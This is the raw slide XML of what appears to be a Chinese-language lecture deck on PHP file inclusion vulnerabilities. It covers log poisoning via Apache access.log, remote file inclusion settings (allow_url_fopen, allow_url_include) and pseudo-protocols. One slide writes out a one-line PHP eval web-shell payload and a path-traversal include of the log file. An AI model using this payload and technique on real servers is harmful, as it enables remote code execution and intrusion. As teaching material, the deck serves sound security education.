                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>默认的日志文件为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>/log/apache2/access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>。日志文件会记录用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>地址、访问的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>、访问时间等信息。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{95947858-2762-4BDD-87C5-A75A77F7048B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="633452"/>
            <a:ext cx="3744416"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prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>场景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>：包含日志文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E1BFEC09-C411-4C8D-A681-0E601F34CB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992771" y="2775841"/>
            <a:ext cx="10873208" cy="2164097"/>
            <a:chOff x="2468935" y="3335160"/>
            <a:chExt cx="7848872" cy="3607969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="矩形 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861378" y="3533003"/>
              <a:ext cx="7144552" cy="3360955"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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利用这个功能，攻击者可以：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="1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25000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="Ø"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="100" dirty="0" smtClean="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>先</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>构造一条包含恶意代码的请求，如</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>http://.../</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>index.php?a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>=&lt;? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"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kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>eval</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>($_POST[‘pass’]); ?&gt;</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，这一条请求</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>会被</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="10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b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>服务器写入日志文件</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0" smtClean="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>中</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="1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25000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="Ø"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="100" dirty="0" smtClean="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>再</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>利用本地文件包含漏洞，如</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>http://.../</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>index.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="1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?func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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=..../../log/apache2/access.log</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，将日志文件引入，使得植入的恶意代码得到执行。</a:t>
              </a:r>
              <a:endPar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 name="矩形: 圆角 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{49E36080-6564-45C2-B1A1-99CA69B89C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2468935" y="3335160"/>
              <a:ext cx="7848872" cy="3607969"/>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307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402" y="5333208"/>
            <a:ext cx="11016943" cy="1173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8545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6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par>
                                <p:cTn id="17" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="19"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1100783" y="1453648"/>
            <a:ext cx="10657184" cy="4888534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">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顾名思义，</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如果存在文件包含漏洞，且允许被包含的文件可以通过</a:t>
            </a:r>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获取，则称为远程文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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中，有两项关于</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打开远程文件的设置，</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allow_url_fopen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dirty="0" err="1"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allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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982663" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"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allow_url_fopen</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设置是否允许</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通过</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打开文件，默认为</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On</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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982663" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"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allow_url_include</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设置是否允许通过</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打开的文件用于</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include</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等函数，默认为</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Off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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2400" dirty="0" err="1"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allow_url_fopen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allow_url_include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开启的前提条件，只有</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allow_url_fopen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与</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allow_url_include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同时设置为</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时，才可能存在远程文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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出于</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安全考虑，这两个变量的值只能在配置文件</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php.ini</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中更改。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{05F161E4-DC58-4EEF-AEC9-22161DFC6C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="864499"/>
            <a:ext cx="4032448" cy="519578"/>
            <a:chOff x="596727" y="864499"/>
            <a:chExt cx="2596493" cy="519578"/>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596727" y="864499"/>
              <a:ext cx="2596493" cy="519578"/>
              <a:chOff x="1420106" y="1392013"/>
              <a:chExt cx="2596493" cy="519578"/>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2646215" y="750719"/>
                <a:ext cx="498142" cy="1802169"/>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048299" y="1392013"/>
                <a:ext cx="1968300"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远程文件包含漏洞</a:t>
                </a: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24" name="security-shield_74740">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D14D2C8D-B2F9-4800-9BB6-309CE3E6B96F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="738317" y="945762"/>
              <a:ext cx="346068" cy="367768"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4091 w 4360"/>
                <a:gd name="T1" fmla="*/ 725 h 4640"/>
                <a:gd name="T2" fmla="*/ 2180 w 4360"/>
                <a:gd name="T3" fmla="*/ 0 h 4640"/>
                <a:gd name="T4" fmla="*/ 269 w 4360"/>
                <a:gd name="T5" fmla="*/ 725 h 4640"/>
                <a:gd name="T6" fmla="*/ 2180 w 4360"/>
                <a:gd name="T7" fmla="*/ 4640 h 4640"/>
                <a:gd name="T8" fmla="*/ 4091 w 4360"/>
                <a:gd name="T9" fmla="*/ 725 h 4640"/>
                <a:gd name="T10" fmla="*/ 698 w 4360"/>
                <a:gd name="T11" fmla="*/ 1138 h 4640"/>
                <a:gd name="T12" fmla="*/ 1962 w 4360"/>
                <a:gd name="T13" fmla="*/ 721 h 4640"/>
                <a:gd name="T14" fmla="*/ 1962 w 4360"/>
                <a:gd name="T15" fmla="*/ 2175 h 4640"/>
                <a:gd name="T16" fmla="*/ 720 w 4360"/>
                <a:gd name="T17" fmla="*/ 2175 h 4640"/>
                <a:gd name="T18" fmla="*/ 698 w 4360"/>
                <a:gd name="T19" fmla="*/ 1138 h 4640"/>
                <a:gd name="T20" fmla="*/ 3012 w 4360"/>
                <a:gd name="T21" fmla="*/ 3664 h 4640"/>
                <a:gd name="T22" fmla="*/ 2397 w 4360"/>
                <a:gd name="T23" fmla="*/ 4081 h 4640"/>
                <a:gd name="T24" fmla="*/ 2397 w 4360"/>
                <a:gd name="T25" fmla="*/ 2610 h 4640"/>
                <a:gd name="T26" fmla="*/ 3574 w 4360"/>
                <a:gd name="T27" fmla="*/ 2610 h 4640"/>
                <a:gd name="T28" fmla="*/ 3478 w 4360"/>
                <a:gd name="T29" fmla="*/ 2941 h 4640"/>
                <a:gd name="T30" fmla="*/ 3012 w 4360"/>
                <a:gd name="T31" fmla="*/ 3664 h 4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60" h="4640">
                  <a:moveTo>
                    <a:pt x="4091" y="725"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3299" y="725"/>
                    <a:pt x="2693" y="499"/>
                    <a:pt x="2180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="499"/>
                    <a:pt x="1060" y="725"/>
                    <a:pt x="269" y="725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="2024"/>
                    <a:pt x="0" y="3884"/>
                    <a:pt x="2180" y="4640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4360" y="3884"/>
                    <a:pt x="4091" y="2024"/>
                    <a:pt x="4091" y="725"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="698" y="1138"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1175" y="1089"/>
                    <a:pt x="1590" y="952"/>
                    <a:pt x="1962" y="721"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1962" y="2175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="2175"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="1827"/>
                    <a:pt x="692" y="1471"/>
                    <a:pt x="698" y="1138"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3012" y="3664"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2846" y="3825"/>
                    <a:pt x="2640" y="3964"/>
                    <a:pt x="2397" y="4081"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2397" y="2610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3574" y="2610"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3548" y="2724"/>
                    <a:pt x="3517" y="2835"/>
                    <a:pt x="3478" y="2941"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3372" y="3227"/>
                    <a:pt x="3220" y="3463"/>
                    <a:pt x="3012" y="3664"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53225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xmlns="" id="{FEB0E624-45B2-420D-9F1E-68C5057D3539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1028775" y="3129612"/>
            <a:ext cx="10945216" cy="3046988"/>
            <a:chOff x="2360923" y="4242153"/>
            <a:chExt cx="10945216" cy="3046988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="组合 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3E3AF54A-5DE7-4013-A16C-C362EE15B6A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2360923" y="4242153"/>
              <a:ext cx="10945216" cy="3046988"/>
              <a:chOff x="4933525" y="1761772"/>
              <a:chExt cx="10945216" cy="3046988"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="六边形 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4D3E3FF0-446F-4951-8FF8-4F6069CD5D02}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4933525" y="2542866"/>
                <a:ext cx="1227414"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sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="文本框 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B0DD5DCC-4113-4A52-8BCE-C10713FDA097}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6935633" y="1761772"/>
                <a:ext cx="8943108"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en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>2. </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通过</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>PHP</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伪协议进行包含</a:t>
                </a:r>
              </a:p>
              <a:p>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在</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PHP</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中，如果</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>allow_url_fopen</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和</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
